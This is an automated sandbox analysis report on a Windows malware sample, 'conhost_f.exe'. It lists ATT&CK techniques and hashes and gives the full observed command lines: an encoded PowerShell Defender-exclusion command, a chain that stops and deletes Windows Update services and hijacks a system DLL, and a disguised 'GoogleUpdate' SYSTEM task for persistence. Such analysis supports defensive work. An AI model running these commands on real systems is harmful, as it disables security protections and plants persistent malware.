5ade09adc83dbcdb8b0a890639d10e525cb4a885cc634a40ca72c1fbda1890f8

Analysis

max time kernel
135s
max time network
46s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
17-08-2022 19:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

conhost_f.exe
Size

1.8MB
MD5

eecdf1e5eb81226c10e087d0f79de8f2
SHA1

9fb1dcd11603cfb6506595d0d8d9147f8dc9d2b2
SHA256

5ade09adc83dbcdb8b0a890639d10e525cb4a885cc634a40ca72c1fbda1890f8
SHA512

2fa58a908dc18a1b1cad91d4b5d556338c0920fb6d2733250f9ab38c23aff532b1c24b9ed76ad85022c7dd5708fb6df185c8cf447b8db4a9d778bbe25a914a89

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

1072 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1932 takeown.exe
652 icacls.exe
1928 takeown.exe
1608 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

2036 cmd.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1932 takeown.exe
652 icacls.exe
1928 takeown.exe
1608 icacls.exe

pid	process
1072	updater.exe

pid	process
1932	takeown.exe
652	icacls.exe
1928	takeown.exe
1608	icacls.exe

pid	process
2036	cmd.exe

pid	process
1932	takeown.exe
652	icacls.exe
1928	takeown.exe
1608	icacls.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

updater.exe

description pid process target process

PID 1072 set thread context of 1040 1072 updater.exe conhost.exe
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1808 sc.exe
1356 sc.exe
1444 sc.exe
1708 sc.exe
812 sc.exe
1348 sc.exe
1192 sc.exe
1832 sc.exe
1772 sc.exe
1060 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

616 schtasks.exe

description	pid	process	target process
PID 1072 set thread context of 1040	1072	updater.exe	conhost.exe

pid	process
1808	sc.exe
1356	sc.exe
1444	sc.exe
1708	sc.exe
812	sc.exe
1348	sc.exe
1192	sc.exe
1832	sc.exe
1772	sc.exe
1060	sc.exe

pid	process
616	schtasks.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1112	reg.exe
676	reg.exe
472	reg.exe
1044	reg.exe
1036	reg.exe
1612	reg.exe
1068	reg.exe
1204	reg.exe
1348	reg.exe
996	reg.exe
756	reg.exe
1352	reg.exe
472	reg.exe
1056	reg.exe
304	reg.exe
996	reg.exe
1408	reg.exe
2044	reg.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.execonhost_f.exepowershell.exeupdater.exe

pid process

936 powershell.exe
736 conhost_f.exe
1356 powershell.exe
1072 updater.exe

pid	process
936	powershell.exe
736	conhost_f.exe
1356	powershell.exe
1072	updater.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.execonhost_f.exetakeown.exepowershell.exeupdater.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	736	conhost_f.exe
Token: SeTakeOwnershipPrivilege	1932	takeown.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	1072	updater.exe
Token: SeTakeOwnershipPrivilege	1928	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

conhost_f.execmd.execmd.execmd.exe

description	pid	process	target process
PID 736 wrote to memory of 888	736	conhost_f.exe	cmd.exe
PID 736 wrote to memory of 888	736	conhost_f.exe	cmd.exe
PID 736 wrote to memory of 888	736	conhost_f.exe	cmd.exe
PID 888 wrote to memory of 936	888	cmd.exe	powershell.exe
PID 888 wrote to memory of 936	888	cmd.exe	powershell.exe
PID 888 wrote to memory of 936	888	cmd.exe	powershell.exe
PID 736 wrote to memory of 2016	736	conhost_f.exe	cmd.exe
PID 736 wrote to memory of 2016	736	conhost_f.exe	cmd.exe
PID 736 wrote to memory of 2016	736	conhost_f.exe	cmd.exe
PID 2016 wrote to memory of 1772	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1772	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1772	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1356	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1356	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1356	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1060	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1060	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1060	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1708	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1708	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1708	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 812	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 812	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 812	2016	cmd.exe	sc.exe
PID 2016 wrote to memory of 1112	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1112	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1112	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1068	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1068	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1068	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1352	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1352	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1352	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1204	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1204	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1204	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1348	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1348	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1348	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1932	2016	cmd.exe	takeown.exe
PID 2016 wrote to memory of 1932	2016	cmd.exe	takeown.exe
PID 2016 wrote to memory of 1932	2016	cmd.exe	takeown.exe
PID 2016 wrote to memory of 652	2016	cmd.exe	icacls.exe
PID 2016 wrote to memory of 652	2016	cmd.exe	icacls.exe
PID 2016 wrote to memory of 652	2016	cmd.exe	icacls.exe
PID 736 wrote to memory of 1408	736	conhost_f.exe	cmd.exe
PID 736 wrote to memory of 1408	736	conhost_f.exe	cmd.exe
PID 736 wrote to memory of 1408	736	conhost_f.exe	cmd.exe
PID 1408 wrote to memory of 616	1408	cmd.exe	schtasks.exe
PID 1408 wrote to memory of 616	1408	cmd.exe	schtasks.exe
PID 1408 wrote to memory of 616	1408	cmd.exe	schtasks.exe
PID 2016 wrote to memory of 996	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 996	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 996	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 472	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 472	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 472	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1056	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1056	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 1056	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 676	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 676	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 676	2016	cmd.exe	reg.exe
PID 2016 wrote to memory of 868	2016	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\conhost_f.exe
"C:\Users\Admin\AppData\Local\Temp\conhost_f.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:736

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGQAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAaAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwByAHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="
2⤵
- Suspicious use of WriteProcessMemory
PID:888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGQAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAaAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwByAHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
- Suspicious use of WriteProcessMemory
PID:2016

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1772

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1356

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1060

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1708

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:812

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:1112

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:1068

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies security service
- Modifies registry key
PID:1352

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:1204

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:1348

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1932

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:652

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:996

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:472

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:1056

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:676

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:868

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:1044

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:1172

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:904

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:980

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:1608

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:1456

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdate" /tr "C:\Users\Admin\Chrome\updater.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1408

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdate" /tr "C:\Users\Admin\Chrome\updater.exe"
3⤵
- Creates scheduled task(s)
PID:616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"
2⤵
- Loads dropped DLL
PID:2036

C:\Users\Admin\Chrome\updater.exe
C:\Users\Admin\Chrome\updater.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1072

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGQAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAaAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwByAHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="
4⤵
PID:1972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGQAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAaAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwByAHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwB1ACMAPgA="
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1492

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:1348

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:1444

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:1192

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1808

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:1832

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:996

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:472

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:756

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:1044

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:304

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1928

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1608

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1612

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1408

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1036

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2044

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:1628

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1152

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:1480

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:936

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
PID:940

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:268

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:920

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
4⤵
PID:1040

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "usrjhfjun"
5⤵
PID:1104

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
16615ea490f54417e662c1a6b2717119

SHA1
25d0a5e4fb995d216451435067845b8799475c59

SHA256
64bad5bb5d3172b25e36770e4030f7f974990f4bd1ae1d67bff92296cda266ee

SHA512
a7fa8783bfb0c8dacda598d6c226d746b8b42df5149d95db3e0e1c67eebbc30f2b33aa64bf5f26559c85d673f868462a2fac223fcdf589aecd26ce34f9293b69

Download Submit
C:\Users\Admin\Chrome\updater.exe

Filesize
1.8MB

MD5
eecdf1e5eb81226c10e087d0f79de8f2

SHA1
9fb1dcd11603cfb6506595d0d8d9147f8dc9d2b2

SHA256
5ade09adc83dbcdb8b0a890639d10e525cb4a885cc634a40ca72c1fbda1890f8

SHA512
2fa58a908dc18a1b1cad91d4b5d556338c0920fb6d2733250f9ab38c23aff532b1c24b9ed76ad85022c7dd5708fb6df185c8cf447b8db4a9d778bbe25a914a89

Download Submit
C:\Users\Admin\Chrome\updater.exe

Filesize
1.8MB

MD5
eecdf1e5eb81226c10e087d0f79de8f2

SHA1
9fb1dcd11603cfb6506595d0d8d9147f8dc9d2b2

SHA256
5ade09adc83dbcdb8b0a890639d10e525cb4a885cc634a40ca72c1fbda1890f8

SHA512
2fa58a908dc18a1b1cad91d4b5d556338c0920fb6d2733250f9ab38c23aff532b1c24b9ed76ad85022c7dd5708fb6df185c8cf447b8db4a9d778bbe25a914a89

Download Submit
\Users\Admin\Chrome\updater.exe

Filesize
1.8MB

MD5
eecdf1e5eb81226c10e087d0f79de8f2

SHA1
9fb1dcd11603cfb6506595d0d8d9147f8dc9d2b2

SHA256
5ade09adc83dbcdb8b0a890639d10e525cb4a885cc634a40ca72c1fbda1890f8

SHA512
2fa58a908dc18a1b1cad91d4b5d556338c0920fb6d2733250f9ab38c23aff532b1c24b9ed76ad85022c7dd5708fb6df185c8cf447b8db4a9d778bbe25a914a89

Download Submit
memory/268-139-0x0000000000000000-mapping.dmp

Download
memory/304-127-0x0000000000000000-mapping.dmp

Download
memory/472-113-0x0000000000000000-mapping.dmp

Download
memory/472-80-0x0000000000000000-mapping.dmp

Download
memory/616-78-0x0000000000000000-mapping.dmp

Download
memory/652-76-0x0000000000000000-mapping.dmp

Download
memory/676-82-0x0000000000000000-mapping.dmp

Download
memory/736-54-0x000000013FC40000-0x000000013FE1C000-memory.dmp

Filesize
1.9MB

Download
memory/736-55-0x000007FEFB991000-0x000007FEFB993000-memory.dmp

Filesize
8KB

Download
memory/756-115-0x0000000000000000-mapping.dmp

Download
memory/812-69-0x0000000000000000-mapping.dmp

Download
memory/868-83-0x0000000000000000-mapping.dmp

Download
memory/888-56-0x0000000000000000-mapping.dmp

Download
memory/904-86-0x0000000000000000-mapping.dmp

Download
memory/920-140-0x0000000000000000-mapping.dmp

Download
memory/936-61-0x0000000002724000-0x0000000002727000-memory.dmp

Filesize
12KB

Download
memory/936-59-0x000007FEED520000-0x000007FEEDF43000-memory.dmp

Filesize
10.1MB

Download
memory/936-57-0x0000000000000000-mapping.dmp

Download
memory/936-60-0x000007FEEC9C0000-0x000007FEED51D000-memory.dmp

Filesize
11.4MB

Download
memory/936-62-0x0000000002724000-0x0000000002727000-memory.dmp

Filesize
12KB

Download
memory/936-63-0x000000000272B000-0x000000000274A000-memory.dmp

Filesize
124KB

Download
memory/936-137-0x0000000000000000-mapping.dmp

Download
memory/940-138-0x0000000000000000-mapping.dmp

Download
memory/980-87-0x0000000000000000-mapping.dmp

Download
memory/996-79-0x0000000000000000-mapping.dmp

Download
memory/996-112-0x0000000000000000-mapping.dmp

Download
memory/1036-132-0x0000000000000000-mapping.dmp

Download
memory/1040-124-0x0000000000401BEA-mapping.dmp

Download
memory/1040-120-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1040-126-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1040-116-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1040-117-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1040-118-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1040-121-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1040-123-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1040-141-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1044-84-0x0000000000000000-mapping.dmp

Download
memory/1044-122-0x0000000000000000-mapping.dmp

